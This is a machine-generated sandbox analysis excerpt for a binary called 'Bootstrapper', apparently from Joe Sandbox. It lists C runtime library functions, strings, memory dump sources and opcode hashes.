                                                                                • API ID: Heap$AllocSize
                                                                                • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                                                                                • API String ID: 3906553864-3244948836
                                                                                • Opcode ID: ee038855baaf2f4d189f27c513afd0c02f7934fb1afd0b390c2838ca67b22b34
                                                                                • Instruction ID: 0dfcf746fc03053c67ad346f8cad3e1504e3e09b346d84c9effda5c1d42982f4
                                                                                • Opcode Fuzzy Hash: ee038855baaf2f4d189f27c513afd0c02f7934fb1afd0b390c2838ca67b22b34
                                                                                • Instruction Fuzzy Hash: 1F3160B0E0020CEFDF14DFA0F94ABAE77B0AB44704F118554F515AB281D7BC9A51CBA5
                                                                                APIs
                                                                                • _strlen.LIBCMT ref: 007806DB
                                                                                • __aligned_msize.LIBCMTD ref: 00780736
                                                                                • __crt_unique_heap_ptr.LIBCMTD ref: 00780741
                                                                                  • Part of subcall function 00780620: __crt_unique_heap_ptr.LIBCMTD ref: 0078062A
                                                                                Strings
                                                                                • %ls, xrefs: 0078068E
                                                                                • D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 00780697
                                                                                • to->_What == nullptr && to->_DoFree == false, xrefs: 00780689
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
                                                                                • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                                                                                • API String ID: 3817959681-3183830673
                                                                                • Opcode ID: 264adf660e38078786126f56855454abd55ec493fb4817edcf7cc2474cc7c6d7
                                                                                • Instruction ID: b7bd5d10f6dcfb04275c4ee15d3a3b31b0deb9c0e15655adcd672af749655845
                                                                                • Opcode Fuzzy Hash: 264adf660e38078786126f56855454abd55ec493fb4817edcf7cc2474cc7c6d7
                                                                                • Instruction Fuzzy Hash: C8318D74A40208EFCB14EF54C856BADB772AF95300F14C098E8199B382EB39EE14CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0791a319c8ef3544381031ce7b32cdd0174f4347c69ffdcbc629afc9e6202d1e
                                                                                • Instruction ID: a46c95ed6de5fb936b0dfcd919ce24057c5569b128865cea6010b93d0fd4cd73
                                                                                • Opcode Fuzzy Hash: 0791a319c8ef3544381031ce7b32cdd0174f4347c69ffdcbc629afc9e6202d1e
                                                                                • Instruction Fuzzy Hash: B161D471C04B08DACF11EF78D90626EBBB4BFD7745F10C769EA882A141EB388994D752
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00781D3A,?,00781A1D,?,?,?,?,?,00781F1A), ref: 007974C8
                                                                                • std::_Timevec::_Timevec.LIBCPMTD ref: 007974D2
                                                                                • __wcstombs_l.LIBCMTD ref: 00797531
                                                                                • std::_Timevec::_Timevec.LIBCPMTD ref: 0079753D
                                                                                Strings
                                                                                • minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00797524
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: TimevecTimevec::_std::_$EnvironmentStrings__wcstombs_l
                                                                                • String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
                                                                                • API String ID: 1494238470-170101930
                                                                                • Opcode ID: 9d4a50849d85dc7d5f2061fb768f923befc4906ac7d3683bb64257b9d06a7d82
                                                                                • Instruction ID: 2ebc82ab02c2656c33258cea08934aac8ac2a96ac4dc2962ea1dc609cf4a7bf3
                                                                                • Opcode Fuzzy Hash: 9d4a50849d85dc7d5f2061fb768f923befc4906ac7d3683bb64257b9d06a7d82
                                                                                • Instruction Fuzzy Hash: 3731FE71D50108EBCF08FBA5D8569FEB778BF54340F904169E506B6192EF386B05DBA0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: __abstract_cw$__hw_cw
                                                                                • String ID: \8x$\8x
                                                                                • API String ID: 4195799695-1529206843
                                                                                • Opcode ID: 8caad265f1aef481bd4d3ab2b873621c97f6665f14878788d2d3bf22011d6c07
                                                                                • Instruction ID: 1957b789c50be8bcce16efc84b62d75fb48525e626e6b3d703720a0a0a38ce62
                                                                                • Opcode Fuzzy Hash: 8caad265f1aef481bd4d3ab2b873621c97f6665f14878788d2d3bf22011d6c07
                                                                                • Instruction Fuzzy Hash: 872137B6D0110CEBCF04DF95E9869AEB7B5FF44301F108595E829AB215E738EB40CB91
                                                                                APIs
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077D3D3
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077D3E7
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077D3F7
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077D402
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ___vcrt_getptd
                                                                                • String ID: csm
                                                                                • API String ID: 984050374-1018135373
                                                                                • Opcode ID: ee06f970f7e79811b31bcd42f8ee169b03a7cfec19d0f880a40833c66d42d83b
                                                                                • Instruction ID: d22c4bc2d6dced75c8d676531d51be8e7fafeb59fadf3ba31d2dd6adbb4ae78c
                                                                                • Opcode Fuzzy Hash: ee06f970f7e79811b31bcd42f8ee169b03a7cfec19d0f880a40833c66d42d83b
                                                                                • Instruction Fuzzy Hash: 4311B778900208DFCF24EFA8C14959EBBB1EF48341B11C5A9E859A7311D778EE40DB92
                                                                                APIs
                                                                                • std::_Timevec::_Timevec.LIBCPMTD ref: 007A4186
                                                                                Strings
                                                                                • minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp, xrefs: 007A416A
                                                                                • %ls, xrefs: 007A4161
                                                                                • public_stream != nullptr, xrefs: 007A415C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: TimevecTimevec::_std::_
                                                                                • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
                                                                                • API String ID: 4219598475-1254537880
                                                                                • Opcode ID: 298a7ca70164ba729f054f26bd2e75562d162c45e7f848da5cf37e7895194e35
                                                                                • Instruction ID: 23a7d9c064fe252713e35e8b15a0c4343d8bda68e7a6fa146e4a9adda32fa598
                                                                                • Opcode Fuzzy Hash: 298a7ca70164ba729f054f26bd2e75562d162c45e7f848da5cf37e7895194e35
                                                                                • Instruction Fuzzy Hash: CD11A070950108EADB08FB50CD4BBEE7668AFA1300FA04168F5051A1D2EFB99F45DB90
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(0000FDE9,?), ref: 007963E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $z
                                                                                • API String ID: 1807457897-2251613814
                                                                                • Opcode ID: 0ffc794a850c7c530e9e48a9ec9eacaaa27d54cbced1b8fc2c2b7ea4e67a2269
                                                                                • Instruction ID: 6ed1786a1ca85da2c0e883781ec7be91abd3464b524ef4519645582acd4e2d49
                                                                                • Opcode Fuzzy Hash: 0ffc794a850c7c530e9e48a9ec9eacaaa27d54cbced1b8fc2c2b7ea4e67a2269
                                                                                • Instruction Fuzzy Hash: 34A13B74A4825C9FDF25CF88D891BE9BB71EF44308F1481D9D94D5B282C278AB92CF94
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,007A7228,?,007A13AF,?,00000000), ref: 007A66E9
                                                                                • GetLastError.KERNEL32(?,007A7228,?,007A13AF,?,00000000), ref: 007A66F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: (rz
                                                                                • API String ID: 442123175-1690717468
                                                                                • Opcode ID: 2a723332de8f49fea46c34ee650f000e2edd95e63de3292949739cd21d73f9cc
                                                                                • Instruction ID: a9ff2ee5fb3e7638410fb94ffb6845f8d55d327d8fcfd122f2beb6d0c6fe41f9
                                                                                • Opcode Fuzzy Hash: 2a723332de8f49fea46c34ee650f000e2edd95e63de3292949739cd21d73f9cc
                                                                                • Instruction Fuzzy Hash: 7151A274A04229DFCB25CF19C9909D9BBB1BF89304F5482E9E90DA7361D630AEC1CF94
                                                                                APIs
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077D2DE
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077D2F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ___vcrt_getptd
                                                                                • String ID: csm
                                                                                • API String ID: 984050374-1018135373
                                                                                • Opcode ID: 9a0da2e733e8609290bb25c5df378773302faf9a4585aeadbcd346f8ee945a77
                                                                                • Instruction ID: 55ddb1ba822313e3e8568c12ab97ca577674ded2f0c0a1dd942f5600b3cd0255
                                                                                • Opcode Fuzzy Hash: 9a0da2e733e8609290bb25c5df378773302faf9a4585aeadbcd346f8ee945a77
                                                                                • Instruction Fuzzy Hash: 5E010878A00208EFCF28DFA5C1458AEBBB6BF44341B608198D8485B316D735DF42DB92